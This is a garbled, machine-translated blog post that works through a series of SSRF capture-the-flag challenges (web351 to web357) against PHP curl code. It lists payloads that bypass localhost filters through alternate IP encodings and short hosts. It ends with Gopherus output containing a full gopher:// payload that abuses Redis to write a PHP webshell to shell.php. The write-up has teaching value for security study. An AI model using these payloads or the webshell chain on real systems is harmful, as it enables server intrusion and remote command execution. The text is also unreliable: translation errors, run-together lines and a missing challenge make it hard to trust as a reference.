Shulou(Shulou.com)05/31 Report--

Php in the introduction and usage of SSRF, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.

SSRF (Server-Side Request Forgery: server-side request forgery) is a security vulnerability constructed by an attacker to form a request initiated by the server. In general, SSRF attacks target internal systems that are inaccessible from the external network. (precisely because it is initiated by the server, it can request an internal system connected to it and isolated from the external network)

Web351

Curl_init-initiates a cURL session

Curl_setopt-sets a cURL transport option.

When CURLOPT_HEADER is enabled, the information from the header file is output as a data stream. URLOPT_RETURNTRANSFER returns the information obtained by curl_exec () as a stream of files instead of outputting it directly.

Curl_exec-execute a cURL session

Curl_close-closes the cURL session

If we access it directly, it will output

Non-local users are prohibited from accessing

So ssrf is required to read flag, payload:

# POSTurl= http://127.0.0.1/flag.phpweb352~ filter 127.0.0 focus localhost hacker

Parse_url-parses the URL and returns its components

/ localhost is filtered here | 127.0.0 /

Fake, you can come out.

Url= http://localhost/flag.phpurl=http://127.0.0.1/flag.php

Try to bypass locally:

Ping 127.0.1ping 127.1ping 0x7F.0.0.1ping 0177.0.0.1

You can also bypass the question if you try.

Web353 hacker

Directly bypass:

Url= http://127.1/flag.phpurl=http://0x7F.0.0.1/flag.phpurl=http://0177.0.0.1/flag.phpweb354 hacker

Filter the ones and zeros directly.

Sure

Point your domain name A record to 127.0.0.1

[http://sudo.cc/](http://sudo.cc/) just points to 127.0.0.1

302 Jump

Hacker

The length of $x ['host'] is not greater than 5.

Directly, 127.1 happens to be 5

Url= http://127.1/flag.php

You can also find a domain name A record with a domain name length not greater than 5 to resolve to 127.0.0.1.

Web356 hacker

This time, the length is no more than 3.

0 is parsed to 127.0.0.1 in linux and 0.0.0.0 in windows

Payload:

Url= http://0/flag.phpweb357 scheme

Domain name resolution to vps

Ssrf.php

It is similar to the previous question.

[root@p1 Gopherus] # python gopherus.py-- exploit redis _. _ _ / _ | | _ /\ _ /\ _ | |\ _ _\ |\ / _ _ /\\ _ () | _ > > Y\ _ / > Y\ _ / | |\ /\ _ /\ _ / | _ | / / _ > _ | | _ / / _ >\ / | _ _ |\ / \ / / author: $_ SpyD3r_$Ready To get SHELLWhat do you want?? (ReverseShell/PHPShell): PHPshellGive web root location of server (default is / var/www/html): Give PHP Payload (We have default PHPShell): Your gopher link is Ready to get PHPShell: gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2424%0D%0A%0A%0A%3C%3F%3Dsystem%28% 27ls%20/%27%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D % 0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0AWhen it's done you can get PHP Shell in / shell.php at the server with `cmd` as parmeter. Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.